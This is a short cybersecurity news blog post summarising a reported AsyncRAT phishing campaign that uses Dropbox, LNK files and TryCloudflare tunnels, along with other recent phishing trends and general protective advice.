Cybercriminals Are Getting Sneakier: How AsyncRAT is Exploiting Python and TryCloudflare

Tweet
Share
Share
Pin

Cyber threats are getting smarter, and hackers are now using AsyncRAT, a powerful remote access trojan (RAT), along with Python payloads and TryCloudflare tunnels to launch stealth attacks.

How the Attack Works

According to cybersecurity researcher Jyotika Singh from Forcepoint X-Labs, the attack kicks off with a simple phishing email. Inside, there’s a Dropbox link that, once clicked, downloads a ZIP file. Inside that ZIP? A tricky little internet shortcut (URL) file that hides a Windows shortcut (LNK) file. While the victim sees a harmless-looking PDF document, the LNK file is busy pushing the infection further.

Here’s where it gets interesting—hackers are using TryCloudflare, a legit Cloudflare service that exposes web servers to the internet without opening ports. This lets them proxy traffic through a dedicated subdomain, keeping their movements hidden.

Once triggered, the LNK file runs a PowerShell script that downloads and executes malicious JavaScript, leading to a batch script (BAT) that pulls down another ZIP file. This final payload contains Python-based malware, which can install AsyncRAT, Venom RAT, and XWorm—dangerous tools that let attackers spy, steal data, and control infected systems.

Not Their First Rodeo

This isn’t the first time AsyncRAT has been used in cyberattacks. A similar campaign was spotted last year, spreading AsyncRAT alongside GuLoader, PureLogs Stealer, Remcos RAT, and Venom RAT. Even worse, hackers have exploited CVE-2024-38213, a now-patched Windows Mark-of-the-Web (MotW) bypass vulnerability, making their attacks even harder to detect.

By using trusted services like Dropbox and TryCloudflare, cybercriminals make their attacks look more legitimate, tricking victims into downloading malware without suspicion.

The Rise of Phishing-as-a-Service

This campaign is part of a growing trend where hackers use Phishing-as-a-Service (PhaaS) toolkits to take over accounts by directing users to fake login pages that look just like Microsoft, Google, Apple, or GitHub.

Some recent phishing scams include:

  • Fake legal documents and receipts to deliver SapphireRAT in Latin America.
  • Credential harvesting pages hosted on government (“.gov”) domains to steal Microsoft 365 logins.
  • Impersonation of tax agencies in Australia, Switzerland, the UK, and the US to steal user credentials and distribute malware.
  • Spoofed Microsoft ADFS login pages designed to steal login details and bypass multi-factor authentication (MFA).
  • Cloudflare Workers (workers.dev) hosting fake login pages mimicking major online services.
  • Employment contract scams targeting German companies using the Sliver implant.
  • Clever phishing tricks that bypass security using invisible characters in emails.
  • Scareware and unwanted programs (PUPs) disguised as legitimate links in a campaign called ApateWeb.

Even Trusted Platforms Aren’t Safe

A recent study by CloudSEK exposed how attackers are exploiting Zendesk’s infrastructure to run phishing scams. Hackers sign up for a free Zendesk trial, register a subdomain, and use it to send fake customer service emails. Since Zendesk doesn’t verify these emails, attackers can easily phish unsuspecting victims.

What Can You Do?

Cybercriminals are getting craftier, and no one is safe without the right protections. Businesses and individuals should:

  • Avoid clicking on suspicious links, even from seemingly trusted sources.
  • Use email authentication and endpoint protection to detect phishing attempts.
  • Stay informed about the latest threats to recognize new attack methods.

For a deeper dive into this attack, check out the full report on The Hacker News. Stay vigilant and stay safe!

References:
Lakshmanan, R. (2025, February 5). AsyncRAT campaign uses Python payloads and TryCloudflare tunnels for stealth attacks. The Hacker News. https://thehackernews.com/2025/02/asyncrat-campaign-uses-python-payloads.html